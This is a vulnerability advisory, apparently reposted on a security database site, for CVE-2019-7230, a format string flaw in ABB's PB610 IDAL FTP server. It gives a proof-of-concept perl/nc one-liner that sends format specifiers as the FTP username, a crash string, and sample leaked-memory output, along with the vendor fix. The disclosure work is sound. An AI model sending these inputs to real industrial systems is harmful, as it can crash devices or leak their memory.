Lucene search
K

ABB IDAL FTP Server Uncontrolled Format String

🗓️ 21 Jun 2019 00:00:00Reported by Eldar MarcussenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 191 Views

ABB IDAL FTP Server Uncontrolled Format String Vulnerability with Memory Corruptio

Related
Code
ReporterTitlePublishedViews
Family
CNVD
ABB PB610 IDAL FTP server format string vulnerability
28 Jun 201900:00
cnvd
CVE
CVE-2019-7230
24 Jun 201916:17
cve
Cvelist
CVE-2019-7230
24 Jun 201916:17
cvelist
EUVD
EUVD-2019-16774
7 Oct 202500:30
euvd
ICS
ABB PB610 Panel Builder 600
27 Jun 201900:00
ics
NVD
CVE-2019-7230
24 Jun 201917:15
nvd
Prion
Format string
24 Jun 201917:15
prion
Positive Technologies
PT-2019-2568 · Abb · Abb Idal Ftp Server
13 Jun 201900:00
ptsecurity
RedhatCVE
CVE-2019-7230
22 May 202510:36
redhatcve
`XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability  
========================================================================  
  
Identifiers  
-----------  
XL-19-004  
CVE-2019-7230  
ABBVU-IAMF-1902008  
  
  
CVSS Score  
----------  
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)  
  
  
Affected vendor  
---------------  
ABB (new.abb.com)  
  
  
Credit  
------  
Eldar Marcussen - xen1thLabs - Software Labs  
  
  
Vulnerability summary  
---------------------  
The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.  
  
  
Technical details  
-----------------  
The IDAL FTP server does not safely handle username strings during the authentication process. Attempting to authenticate with the username `%s%p%x%d` will crash the server. Sending `%08x.AAAA.%08x.%08x` will log memory content from the stack.  
  
  
Proof of concept  
----------------  
```  
perl -e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22  
````  
  
UserManagementModule::isUserExist failed. "72657355.AAAA.616e614d.656d6567" not present in UserFactory  
UserManagementModule::LoginFTPUser failed. User :"72657355.AAAA.616e614d.656d6567" not present in UserFactory  
  
  
Affected systems  
----------------  
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367  
  
  
Solution  
--------  
Apply the patches and instructions from vendor:  
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch  
  
  
Disclosure timeline  
-------------------  
04/02/2019 - Contacted ABB requesting disclosure coordination  
05/02/2019 - Provided vulnerability details  
05/06/2019 - Patch available  
17/06/2019 - xen1thLabs public disclosure  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation